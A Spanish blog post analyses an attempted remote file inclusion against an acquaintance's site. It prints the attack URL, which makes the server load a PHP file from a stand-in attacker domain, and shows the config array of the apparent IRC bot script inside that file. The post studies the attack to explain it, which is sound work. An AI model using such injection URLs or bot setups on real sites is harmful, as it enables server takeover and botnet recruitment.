Hace unos días un conocido me comentó que alguien había intentado acceder a su web y había tratado inyectar una URL, pero la forma de hacerlo no tenía sentido. Me llamó la atención y le dije que me enviase ejemplos de lo que habían tratado de hacer.
Intento de explotación de un LFI:
www.dominiovictima.com/gratis//appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt
Analizando la URL atacada podemos ver dos partes claramente diferenciadas, la url víctima y la inyección, en esta última vemos otra URL que contiene un archivo .txt:
/appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt
Vamos a ver el contenido de ese sospechoso txt que podeis encontrar aqui:
A simple vista lo primero que llama la atención son tres cosas, una cabecera bastante descriptiva de lo que hace el script, unas líneas de configuración y un footer con el nombre de una comunidad.<?php var $config = array("server"=>"irc.dominio.net", "port"=>"6667", "pass"=>"", "prefix"=>"BoT", "maxrand"=>"5", "chan"=>"#channel", "chan2"=>"#channel", "key"=>"senhadocanal", "modes"=>"+p", "password"=>"terpmak", "trigger"=>".", "hostauth"=>"127.0.0.1" ); ?>
